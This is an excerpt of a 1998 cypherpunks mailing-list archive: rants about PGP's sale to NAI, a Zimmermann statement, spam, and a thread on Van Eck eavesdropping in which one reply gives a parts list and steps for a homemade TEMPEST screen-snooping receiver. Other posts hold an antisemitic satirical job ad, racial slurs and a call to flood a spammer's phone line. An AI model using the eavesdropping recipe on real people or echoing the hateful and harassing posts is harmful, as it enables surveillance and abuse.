> terms of what someone may have promised in return for
> destroying PGP. It's a lot easier to see how that might
> be the case than to see how NAI/NG could come out winning
> in the marketplace by cancelling out everything that PGP,
> Inc. had going for it.

  Back in the 'old days', when I had to walk ten miles, uphill,
in a blinding snowstorm, only to find that computers did not
exist yet, I was a founder of one of the first Canadian 
anti-nuclear grassroots organizations.
  Once the anti-nuke movement had progressed to the point  
where it was a viable entity, worthy of press coverage,
etc., the Canadian government began to 'recognize' the
legitimacy of the movement, and to 'fund' it (hee-hee).
  I went to the self-congratulatory celebration party held
by the members of the group I had founded who had managed
to line up at the government trough by abandoning their
ethics and values in favor of a government-mandated policy
of taking a 'reasonable' middle-road in the group's activities.
  I was there for eleven minutes. I spent the first five minutes
shoveling as much free food as humanly possible down my throat.
I spent the next five minutes draining every bottle of free
liquor in sight down my throat. I spent the next minute barfing
everything I had consumed all over the government representative
who was in attendance to make certain that everyone was toeing
the line and not saying 'bad things' about the Canadian government
or the Nuclear Power Industry.

Prologic Management Systems, Inc., bought Basis, Inc., in Berzerkeley
a couple years ago (considered by some to be the main lair of a 
secret organization dedicated to preventing the Evil One from using
computer technology to imprison the minds and souls of humankind).
My research indicated that Prologic was a spook-owned 'company killer'
which specialized in buying out and decimating companies who actually
had a capacity to resist the diabolical aims of the NWO.
When Network Associates bought PGP, I did similar research on NAI
and Network General, and came to the same conclusions.

> ("Psst! Buy PGP
> and fuck it over until no one recognizes or trusts it,
> and we'll throw you a $50 million contract next year
> from our Black Budget!")

  I have a friend in Arizona who asks me for investment advice, and
I recently told him to invest heavily in companies being acquired
by WorldComm.
  My rationalization for his investing heavily in companies in league
with the Anti-Christ was that, when Jesus comes back, he'll have 
enough money to buy him a meal and drinks at the best restaurant in
town, thus redeeming himself.

> This is a Pretty Good Example of why it was a Pretty
> Bad Idea to form PGP, Inc. in the first place. Phil,
> the brave but too-politically-correct middle-aged naive
> liberal guy, is seeing his creation burn to ashes before
> his eyes. Parents should never outlive their children --
> it ruins them, as is part of the game plan here, I
> suspect.
 
> FuckedAgainGeezMyAssIsGettingSoreMonger II

Whenever the government 'legitimatizes' any organization/product, it
is generally for the purpose of co-opting/fucking them.
The government uses the carrot-stick method on the citizen-animal.
First, it gives them the carrot/benefit for registering their identity
with the government (SSN#) and then it gives them the stick/buttfucking
once they are identified and categorized.

ImFromTheGovernmentAndImHereToHelpBendOverAndGiveMeYourNumberMonger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Spectre <spectre@anthrax.net>
Date: Tue, 17 Mar 1998 20:12:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: EMI, Van Eck, etc.
Message-ID: <B0000003809@hades.crmcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In almost every writing I've come across regarding Van Eck, I notice the
phrase "...simply a modified television" or something along those lines.

Does anyone have a document for actually modifying a television set to do
this sort of thing?  It doesn't have to be extremely long ranged, and could
in fact be very short range.. I am interested in performing my own
experiments into defeating this sort of eavesdropping.

Also, would it be possible to scramble the signal into an unusable level by
simply putting another device emanating RF at the snooping frequencies
nearby the machine that you want to protect?  Something generating white
noise at that frequency, but with a purposely built antenna, say a high
gain type turned outward from the monitor, with a significantly higher
power output than the monitor?

Thanks..

-The Spectre [SP4 w/ Clam Cluster]
-http://www.anthrax.net/cos
"No man is clever enough to know all the evil he does."  -  La Rochefoucauld





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TOTO ENTERPRISES <toto@sk.sympatico.ca>
Date: Tue, 17 Mar 1998 21:53:36 -0800 (PST)
To: bill payne <billp@nmol.com>
Subject: PROGRAMMERS WANTED !!!
In-Reply-To: <3504A945.1286@nmol.com>
Message-ID: <350F7879.436@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


TOTO ENTERPRISES is looking for C, C++, and Java programmers to
write code designed to identify and categorize persons of Jewish
extraction from a variety of government, public and private databases
around the world.

Applicants should be company-oriented individuals who have no qualms
about writing code that contains no backdoors that would allow those
who later worry about the use their creations are being put to access
to the systems of those using those programs.

No cryptography skills will be required of those applicants working
in areas where U.S. exportable crypto is dominant.

Applicants will be able to work from their homes, with only occassional
trips to the Antarctic required.

Applicants who can translate "We're from the government and we're here
to help you." into several different languages will be given preference.

Applicants who can translate "We're from the government and we're here
to help you into the cattle-cars." into several different languages
will automatically be given credit for applicable prior work experience.

To receive an application by email, reply to this message with an
empty message body, and a 'Subject' header of, "Mein Kamf."

(True CypherPunks need not apply...)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 17 Mar 1998 19:27:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Eighth Word You Can't Say On The Internet
Message-ID: <199803180327.EAA11046@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Armies Gather by Jeff Elliott 

The most surprising place where anti-abortion provisions have appeared,
however,
                   was in the mammoth Telecommunications Deregulation
Bill. Late in the day of January 30th,
                   Colorado Representative Pat Schroeder made an
unpleasant discovery: a last-minute addition
                   appeared to make it a crime to discuss abortion on
the Internet. 

                   The Telcom Bill already had the controversial
"Communications Decency Act" that made it a felony
                   to mention the seven dirty words forbidden on radio
or TV; that was well known, and much
                   discussed in both the House and the Senate. But this
abortion clause was new, and would make
                   "abortion" the eighth word banned from cyberspace. 

                   The ACLU and 19 other organizations filed for a
temporary restraining order on the same day that
                   Clinton signed the bill. But while the federal judge
ruled, the vague "indecency" provisions were
                   probably unconstitutional and should be heard by a
special 3-judge panel, the restraining order on
                   the abortion section was denied. 

                   Schroeder and others are trying to repeal the ancient
law behind these restrictions, but passage in the
                   rightward-tilted House is far from certain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 18 Mar 1998 04:16:17 -0800 (PST)
To: jya@pipeline.com (John Young)
Subject: Re: Will New Sendmail Block Remailers?
In-Reply-To: <1.5.4.32.19980317141322.006c25cc@pop.pipeline.com>
Message-ID: <199803181215.GAA31936@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


John Young wrote:
> Markoff in the NYT reports today on the release of a new 
> Sendmail upgrade by author Eric Allman that will block 
> spam by checking the legitimacy of the originating address 
> before delivery.
> 
> The report claims that spam is up to 10% of e-mail worldwide,
> And that Sendmail is used on 75% of the computers that route 
> e-mail, all of which are being fitted with the new program.
> 
> What are the chances that this will affect remailers or other 
> means of eternal anonymity?
> 
> Except Sualk, GL, UB and Nuh, all of whom we now know 
> are Otot GinPu Tca as those crazy Syug Irtmid Irun.

WRT remailers, sendmail only checks the validity of a domain.

So if a "From " address is "anonymous@replay.com", the message
would be passed on.

I have read the Sendmail announcement from sendmail.org. The new version
is very nice and friendly to everyone except spam relayers.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qwlkty89z@xpc.xpoint.co
Date: Wed, 18 Mar 1998 14:37:27 -0800 (PST)
To: kajd3847jclz@www.longnet.com.au
Subject: 68 Million Email Addresses - $99
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


          68 MILLION
 EMAIL ADDRESSES
 FOR ONLY $99 
       

 You want to make some money? 

 I can put you in touch with over 60 million people at virtualy no cost.

 Can you make one cent from each of theses names?

If you can you have a profit of over $600,000.00 

This offer is not for everyone. 

If you can not see the just how excellent the
 risk / reward ratio in this offer is then there is nothing I can do for you. 

To make money you must stop dreaming and TAKE ACTION.


****************************************

PACKAGE  A

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!

$99.00

****************************************

PACKAGE B

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

$ 139.00

****************************************

PACKAGE  C

THE WORKS

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

             AND 

Over 500 diferent Business Reports

now being sold on the internet for up to

$100 each. You get full rights to resell these reports.

With this package you get the email addresses, 

the software to mail them AND ready to sell  information products.

AND ...... 

. a collection of the 100 best money making

adds currently floating around on the internet.

$ 189

****************************************

SEVERAL WAYS TO ORDER !!!

IF YOU ORDER BY PHONE WE WILL SHIP YOUR CD CONTAINING THE 68 MILLION + NAMES WITHIN 12 HOURS OF YOUR ORDER!!!

 
  1) WE ACCEPT:  AMERICAN EXPRESS OR
    
                               VISA <> MASTERCARD
 
     TYPE OF CARD  AMX / VISA / MC??_______________

      EXPIRATION DATE   ___________________________
 
     NAME ON CREDIT CARD________________________
 
     CREDIT CARD #________________________________
 
     BILLING ADDRESS ____________________________
 
     CITY_________________________________________
 
    STATE________________ZIP_____________________
 
   PHONE INCLUDE AREA CODE___________________
   
    EMAIL ADDRESS______________________________ 

        WE WILL BILL selected amount to your account plus the following shipping costs

        SHIPPING  COST OF 3.85 FIRST CLASS MAIL

        SHIPPING COST OF  15.00  24 HOUR EXPRESS MAIL /  FEDERAL EXPRESS
 
        SALES TAX (7.25%) added to CA residents 
 
  >>> Send correct amount in cash, check or money

order to:

  >>> ELECTRIC EMAIL
  >>> 702 Mangrove Avenue, Suite 151
  >>> Chico, CA 95926


  2) Send the same above requested credit card 

information to above address. 


   3) Fax the same above credit card information to 530-895-

8470

   4) Call phone # 530-876-4291.  This is a 24 hour phone 

number to place a CREDIT CARD order.

   5) FAX A COPY of your signed check to 530-895-8470.

       This is an EXCELLENT way to order without a credit card!



Electric Email is a private company and is not affiliated with, or endorsed by, AOL, MSN, or any other Internet Service Provider.

Copyright 1998

All rights reserved

Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof, or abridging the freedom of speech 
or of the press; or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances.         
    
Amendment I, The US Constitution                                                                :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Sheeple" <ass@dev.null>
Date: Wed, 18 Mar 1998 09:55:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: They don't need no stinking privacy!
Message-ID: <35102602.1811@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


An Open Letter To The CypherPunks:

Due to the large amounts of ridicule heaped upon the Sheeple family
by members of the CypherPunks list, I have decided to write to the
list to clarify a few of the issues on which our family's stances
are apparently misunderstood by people outside the pen.

First of all, we are AdamAnt about retaining our right to privacy,
but we recognize the need for the authorities to invade other people's 
right to privacy, in order to protect us from them.

We demand our right to a fair and impartial trial before a jury of
our peers, but we recognized the need for law enforcement agencies
and the justice system to take whatever steps are needed to make
certain that others are convicted in accordance with the desires
of the majority of their betters, according to the results of the
Sheeple polls taken by CNN and People's Court.
(Note: We, the Sheeple, are willing to do our part, and look the other
 way when those responsible for our protection need to stretch the
 boundaries of belief by claiming that a black wife-beater is not
 a suspect in the murder of his wife and her white lover, as they
 climb over a fence onto his private property, without a warrant,
 saying, "We're white men from the government, and we're here to
 help a Black-Afro American.]

We wish to exercise our right to have security in our private 
communications by employing strong cryptography, but we also
recognize the need for our government to intercept communications
by foreigners, in order to protect us and to manipulate world events
in a manner that will keep the price of our TV's as low as possible.

We wish to exercise our right to free speech, but we recognize the
need of authorities to prevent filth and vermin from using disgusting
and perverted language such as, "Baah...Baah...", instead of righteous
and politically correct language such as "Baaa...Baaa."

In short, or position is that we wish to retain all of our rights
and freedoms, but support them being compromised or taken away from
others, for the good of the Sheeple.

A. Sheeple





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: inquiry@asset-max.com (Asset-Max)
Date: Wed, 18 Mar 1998 12:27:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Consolidate Debts, Home Improvements
Message-ID: <199803182030.MAA15378>
MIME-Version: 1.0
Content-Type: text/plain


THIS IS A LIMITED-TIME OFFER FOR HOMEOWNERS ONLY.

AS A HOMEOWNER YOU ARE ENTITLED TO A FREE CONSULTATION.

Are you interested in home improvements, consolidating
your monthly bills AND reducing your payments?

Do you have an unanticipated need for at least $25,000 for any reason?

Are you the owner/occupant of a single family, free standing residence?

These days, it's more important than ever to know how to get the
most out of owning a home. To help you do just that, we've
created a variety of unique financing programs and options.

Remember: This valuable information is absolutely FREE!

Learn How To:
* GET 24-HOUR PRE-APPROVAL
* GET UP TO $80,000 WITH NO EQUITY
* CONSOLIDATE BILLS
* MAKE HOME IMPROVEMENTS
* PAY FOR COLLEGE
* BUY A NEW CAR, BOAT, OR EVEN 2ND HOME

*** SAVE THOUSANDS YEARLY IN INTEREST PAYMENTS ***

Even if:
* YOU'RE SELF-EMPLOYED
* HAVE HEAVY DEBT
* HAVE BEEN PREVIOUSLY DECLINED
* YOU CAN'T PROVE ALL YOUR INCOME

Plus, on certain programs, there's:
* NO PREPAYMENT PENALTY
* NO APPRAISAL REQUIRED

Thousands of people just like you have already responded and
have been helped. However, this offer may not be available
indefinitely, so act now.

TO RECEIVE YOUR COMPLIMENTARY AND CONFIDENTIAL CONSULTATION,
click on a highlighted link below

<A HREF="http://www.asset-max.com/mortgage.html">
http://www.asset-max.com/mortgage.html
</A>

http://www.asset-max.com/mortgage.html

(if your mail reader does not support clickable
links, copy the above URL into your Web browser)

OR
simply email your reply, with the following information:

name:
street address:
city:
state:
zip:
home phone:
(best time for a Senior Loan Officer to call):
business phone:
(best time for a Senior Loan Officer to call):

estimated current market value of home:
estimated current mortgage balance:
amount to borrow:


FIND OUT WHAT YOU QUALIFY FOR -- KNOW YOUR OPTIONS!

---------------------------------------------------

This mailing is intended to be of interest to a large
audience and to communicate a valuable offer.  If you
have no interest in this offer, be advised that other
valuable promotions will be featured in future mailings
which may be of interest to you.  However, if you have
no desire to receive offers of value from us in the
future, please email us with "Remove" as the subject
and you will be removed from this mailing list.

Copyright 1998 Asset Max. The information contained in
this email message may not be published, broadcast,
rewritten, or otherwise distributed without the express
written consent of Marathon.

Offer void where prohibited by law.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Wed, 18 Mar 1998 05:09:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: EMI, Van Eck, etc.
In-Reply-To: <B0000003809@hades.crmcom.com>
Message-ID: <E0yFIay-0007c1-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


The Spectre wrote on 1998-03-18 05:11 UTC:
> In almost every writing I've come across regarding Van Eck, I notice the
> phrase "...simply a modified television" or something along those lines.
> 
> Does anyone have a document for actually modifying a television set to do
> this sort of thing?  It doesn't have to be extremely long ranged, and could
> in fact be very short range.. I am interested in performing my own
> experiments into defeating this sort of eavesdropping.

Ingredients for a minimum cost quick&dirty TEMPEST experiment:

1 RF tuner of a VCR
1 antenna amplifier
1 antenna
1 multisync PC monitor
1 PC with a video card (or a pair of tuneable sync oscillators)

Connect the PC with the video card to the SYNC inputs of the multisync
monitor. Program the video card to a video mode with the same deflection
frequencies as that used by the target system. Connect the baseband output
of your tuner to the VIDEO-IN pins of your monitor. Connect the antenna
and amplifier to the RF input of your tuner. Switch on. Fill the
screen of the target device with a big symbol consisting of dithered and
non-dithered areas for best results in the first trials. Now tune
through the VHF bands starting with the dot clock frequency of the
target.

That's it basically. Such a primitive TEMPEST monitor is of course
unsuitable for evaluating the threat from much more sophisticated wide-band
DSP eavesdropping receivers that directly attempt OCR-style algorithms
on the signal with matched filters. But it is fun to play around with, it
is useful for getting a feeling for the effect, and it is suitable for
demonstrating most of the Soft Tempest tricks that I described in
<http://www.cl.cam.ac.uk/~mgk25/ih98-tempest.pdf>.

> Also, would it be possible to scramble the signal into an unusable level by
> simply putting another device emanating RF at the snooping frequencies
> nearby the machine that you want to protect?  Something generating white
> noise at that frequency, but with a purposely built antenna, say a high
> gain type turned outward from the monitor, with a significantly higher
> power output than the monitor?

The FCC and your radiologist advise against this. Shielding is much
more elegant than jamming. Remember that CRT content is a periodic
signal, thus you can suppress uncorrelated noise by periodic averaging
rather easily. Good jamming must produce a correlated output signal.
See United States Patents 5165098 and 5297201 for descriptions of
correlated jammers. I don't think, these are widely used though, as the
TEMPEST standards seem to mandate shielding and not jamming, which I
think is very sensible.

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Graffam <phundie@mhv.net>
Date: Wed, 18 Mar 1998 10:36:54 -0800 (PST)
To: The Spectre <spectre@anthrax.net>
Subject: Re: EMI, Van Eck, etc.
In-Reply-To: <B0000003809@hades.crmcom.com>
Message-ID: <Pine.LNX.3.96.980318132056.32100A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Mar 1998, The Spectre wrote:
> Does anyone have a document for actually modifying a television set to do
> this sort of thing?  It doesn't have to be extremely long ranged, and could
> in fact be very short range.. I am interested in performing my own
> experiments into defeating this sort of eavesdropping.

Well, for one.. I don't think (speculation, I haven't done any real
investigation into it yet..) that this oft repeated maxim applies to
modern hi-res monitors with super refresh rates. I don't think that a
TV could be used to display emanations from a new monitor. OTOH, I
haven't looked into modern TV technology at all.. I don't know what
the new sets are really capable of. Suffice it to say, you probably
won't be able to modify an older set to snoop on a new monitor set up
at 1280x1024, but if for experiment purposes to just did a text display
you should be able to snoop that with an older set.

> Also, would it be possible to scramble the signal into an unusable level by
> simply putting another device emanating RF at the snooping frequencies
> nearby the machine that you want to protect?  Something generating white
> noise at that frequency, but with a purposely built antenna, say a high
> gain type turned outward from the monitor, with a significantly higher
> power output than the monitor?

I would think that any device of this sort would make the monitor's 
display rather distorted.. unless you put shielding around it to
protect it, but that same shielding would prevent usable EMR.

Find the Unofficial Tempest Homepage (sorry, dont have the URL handy..
but I found it a few times by searching out the title from altavista)
it has links to Van Eck's original paper, and if memory serves papers
that "fill in" the gaps of Van Eck's work to help in modifying
equipment.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Act only according to that maxim by which you can at the same time will that
it should become a universal law.." - Immanuel Kant "Metaphysics of Morals"

** This message not PGP signed because I am logged in through an insecure
** channel. Caution may be warranted.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 18 Mar 1998 10:48:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: PRZ on PGP/NAI/TIS/Key Recovery
Message-ID: <1.5.4.32.19980318184942.006dedbc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 18 Mar 1998 12:48:48 -0500
To: jya@jya.com
From: Ed Stone <estone@synernet.com>
Subject: PGP/NAI merger and key recovery

I received the following email from Phil Zimmermann, regarding concerns I
have expressed about NAI's acquisition of TIS, a substantial contractor to
the National Security Agency, and a major developer of key recovery
capabilities.

>> begin PRZ email<<<

Date: Wed, 18 Mar 1998 01:20:34 -0800
To: estone@synernet.com
From: Philip Zimmermann <prz@pgp.com>
Subject: PGP/NAI merger and key recovery
Cc: prz@pgp.com

Ed, I saw your recent remarks in comp.security.pgp.discuss.  I'd like
to make a few points.  You may quote me on this.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Mergers are complex operations, especially mergers of publicly traded 
companies of this size.  NAI and TIS will not fully close the merger deal 
for about 60 days.  Until then, there are many policy details we cannot 
discuss in public.

NAI has no plans to incorporate TIS's key recovery technology in any 
version of PGP, including our business versions.  I have discussed this
point with NAI management.

I have not changed my political values regarding privacy and crypto.
I would not have allowed the sale of my company to NAI if they were 
going to buy PGP in order to bury PGP, as some have feared.  They 
bought PGP because they value the reputation that PGP has earned in 
the industry.  They want to preserve that reputation by preserving 
PGP's product integrity.  I plan to keep watch over PGP's product 
integrity for the foreseeable future.

NAI plans to keep publishing our source code for peer review.  Source 
code publication in printed books is a vital part of NAI's business 
strategy, especially its overseas strategy.  There will be an important
announcement on this subject on 20 March at CeBit in Hannover Germany.

 -Philip Zimmermann

-----BEGIN PGP SIGNATURE-----
Version: PGP 5.5.5

iQA/AwUBNQ+RzWPLaR3669X8EQLuRwCcDowyBBr32YtbsnYSHy6clTW+7CwAnjpk
KnVN0NVreBNuIOyxsAcWIb40
=vY/q
-----END PGP SIGNATURE-----

>>>end PRZ email<<<
--
-------------------
Ed Stone
estone@synernet.com
-------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 18 Mar 1998 11:20:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: EMI, Van Eck, etc.
Message-ID: <1.5.4.32.19980318192230.006ee93c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Graffam wrote:

>Find the Unofficial Tempest Homepage (sorry, dont have the URL handy..

That's Joel McNamara's bountiful and ever-growing TEMPEST site:

   http://www.eskimo.com/~joelm/tempest.html

While the work of Markus Kuhn and Ross Anderson provide more recent
unclassified information Joel has a standing request for any TEMPEST
material that is created by research or liberated from tax-pits and fat
corp labs. Some black stuff comes over the transom.

RF and EM offensive and defensive weapons are whitehot in national 
security labs around the globe, and probably equally so in commercial 
cages where NDA transgressors are hoovering dual-usage technologies 
out of MOD's coffers like subway turnstile-suckers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Wed, 18 Mar 1998 14:50:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PRZ comments
Message-ID: <9803182246.AA29563@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain


Somebody quoted PRZ's message about the NAI/PGP/TIS merger deal,
which puts to rest for now some of <my> concerns about the weird
juxtaposition of companies, anyway.  He didn't address the
issue of NAI becoming a KRAP again.

Anonymous quoted:
> -----BEGIN PGP SIGNED MESSAGE-----
...
> announcement on this subject on 20 March at CeBit in Hannover Germany.
> 
> -Philip Zimmermann
> 
> -----BEGIN PGP SIGNATURE-----

and then s/he said:
> I'm just curious, and no offense intended, but Phil's signature is
> bad in the signed message.  I'm using PGP 5.55, and it has his key
> in it, and it doesn't check out.  "Things that make you go 'hmmmmm'".......

Just a formatting problem.  If you put a space before the "-Philip" the
message checks just fine.  There are several other copies of the message
posted around the Web already with the correct formatting, and the other
one I checked had the spacing right already (which is how I knew where to
look on this copy).  See, for example, the copy at http://jya.com .

	Jim Gillogly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Eric Tune" <paladin@lvcablemodem.com>
Date: Wed, 18 Mar 1998 15:24:52 -0800 (PST)
To: "Ken Williams" <cypherpunks@toad.com>
Subject: Re: interNIC is a bunch of fuckwads... (fwd)
Message-ID: <000e01bd52c5$03f27c20$2a06ea18@paladin.lvcablemodem.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>A friend of mine put in a request to reg "pimpshit.com" the other day
but
>it was DENIED by interNIC because it was deemed "innapropriate"..
>
>WHAT THE FUCK?  lets see, fucker.com *isn't* innapropriate?
assmaster.com
>isn't?  what the hell crawled up their asses and died?  why is a
>commercial corporation running the internet?  why is free speech
being
>taken away by these fuckwads? let me guess, they also will support
CDA2.
>and any other censorship bullshit that our government tries to
"protect
>us" with?
>
>goddamnit,. people should be able to reg whatever the fuck they want.
from
>pussy.org, to nigger.com... I don't give a fuck if it's offensive to
me or
>anybody, people should still have that very simple right.
>
>so, does anyone know what the story is? is interNIC going to refuse
>re-registration for such names as fucker.com nigger.com pussy.com
etc...?
>or are they just refusing new registration with "innapropriate"
stuff?
>They'd better refuse re-registration, otherwise it's totally unfair
to
>EVERYBODY... hell, they're already being unfair to everybody..
>
>fuckers.
>

Don't that just suck... I was a bit pessimistic about finding
fucker.com, but lo and behold, there it was, www.fucker.com ...talk
about bullshit.  If they will register this, they should register
"pimpshit.com" too.  Talk about "selective memory loss"...sheesh.  I'm
heading to their site (internic) to bitch about their selective and
prejudicial policy "change"...

Eric J. Tune
paladin@lvcablemodem.com
PGP 5.55 and 2.62 keys available upon request.
DO NOT EXPORT STRONG CRYPTO BELOW...OH NO!
print pack"C*",split/\D+/,`echo
"16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|
dc`








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Wed, 18 Mar 1998 12:52:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: interNIC is a bunch of fuckwads... (fwd)
Message-ID: <Pine.SOL.3.96.980318155210.5796A-100000@c00954-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Wed, 18 Mar 1998 11:19:15 -0800 (PST)
From: Christian Hedegaard <chs@silcon.com>
To: dc-stuff@merde.dis.org
Cc: kemkidd@clearink.com
Subject: interNIC is a bunch of fuckwads...


A friend of mine put in a request to reg "pimpshit.com" the other day but
it was DENIED by interNIC because it was deemed "innapropriate"..

WHAT THE FUCK?  lets see, fucker.com *isn't* innapropriate? assmaster.com
isn't?  what the hell crawled up their asses and died?  why is a
commercial corporation running the internet?  why is free speech being
taken away by these fuckwads? let me guess, they also will support CDA2.
and any other censorship bullshit that our government tries to "protect
us" with?

goddamnit,. people should be able to reg whatever the fuck they want. from
pussy.org, to nigger.com... I don't give a fuck if it's offensive to me or
anybody, people should still have that very simple right.

so, does anyone know what the story is? is interNIC going to refuse
re-registration for such names as fucker.com nigger.com pussy.com etc...?
or are they just refusing new registration with "innapropriate" stuff?
They'd better refuse re-registration, otherwise it's totally unfair to
EVERYBODY... hell, they're already being unfair to everybody..

fuckers.

--
ICQ: 8141565
-------------------------------------------------------------------------------
"It's yet another in a long series of diversions in an attempt to avoid
responsibilty" -Chris Knight, "Real Genius"
-------------------------------------------------------------------------------
"Out the SPARC, through the router, down the fiber, off another router, down
the T3, past the firewall... nuthin but NET"
-------------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 18 Mar 1998 07:59:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: You've got to save room for desert...
Message-ID: <199803181558.QAA21882@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Takes 18 bee hummingbirds to weigh as much as a shot of
whiskey.

==============================================
LMBoyd Web Site / U. S. Newspapers / Start Email / Stop Email 
http://www.LMBoyd.com/postscript.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Genocide <genocide@Genocide2600.com>
Date: Wed, 18 Mar 1998 17:13:07 -0800 (PST)
To: Ken Williams <jkwilli2@unity.ncsu.edu>
Subject: Re: interNIC is a bunch of fuckwads... (fwd)
In-Reply-To: <Pine.SOL.3.96.980318155210.5796A-100000@c00954-100lez.eos.ncsu.edu>
Message-ID: <Pine.LNX.3.96.980318171041.17482G-100000@adric.genocide2600.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Mar 1998, Ken Williams wrote:

> A friend of mine put in a request to reg "pimpshit.com" the other day but
> it was DENIED by interNIC because it was deemed "innapropriate"..

	I once remember a time when there was this well known story about
"Freedom of Speech", I believe it's only a rumor in todays world.

Genocide
Head of the Genocide2600 Group
Board Member of E.H.A.P

============================================================================
         ____________________
  *---===|                  |===---*
  *---===|     Genocide     |===---*  "Courage is not defined by those who 
  *---===|       2600       |===---*   fought and did not fall, but by those
  *---===|__________________|===---*   who fought, fell, and rose again."
                                       
Email:  Genocide@Genocide2600.com
Web:	http://www.Genocide2600.com

Check out the mud at:		genocide2600.com 6666

============================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Wed, 18 Mar 1998 10:06:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: fight back at SPAM!
Message-ID: <19980318180502.25156.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain


I received some annoying spam today.  Unbelievably, they included a 1-800
number.  Since they wasted my time, I thought I'd call them up and waste
their time (on their nickel!).

I got a recording asking me to leave a message.  I then called back and
it stated that this was my last call for the day.  Apparently they only
accept two phone calls from each distinct phone number.

The phone number is 1-800-338-6150 if anyone else feels like calling them
up and tying up their phone line. 

I'm not going to mention what they're selling, since that would be doing
them a favor.  Maybe when they get their phone bill they will realize the
problems associated with direct email marketing on the Internet.  ;-)

If a honest-to-goodness live person answers, just talk to 'em and try to
keep them on the line as long as possible.  Ask questions about their
product, etc.  The longer they talk to you, the more it costs them!

You get the picture! 

Enjoy!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 18 Mar 1998 10:06:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Rapist from the Internet Chat Room
Message-ID: <199803181805.TAA12602@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


   Alleged `Cybersex' Victim Testifies 
   By SAMUEL MAULL, Associated Press Writer
   
NEW YORK -- A woman who says a graduate student she met online tied her up
and raped her in his apartment tearfully described for jurors how she
begged, "Don't rape me, don't dismember me, don't kill me" before escaping.

   In emotional testimony Tuesday, the 22 -year-old woman said she managed
to untie herself from a futon, fight off her assailant and flee.

   "I was sore.  I was exhausted.  I didn't want to move," she said, then
describing how she loosed the cloth strips:  "I felt so good!  I got it
undone and I stood up!  I got it undone!  I looked at him and he looked
frightened!  I'm not going to die!"

   The witness, who said she was naked while tied up, said she grabbed her
clothes and got dressed while running for the door and fighting off the man
who had held her as a sex captive for more than 20 hours.

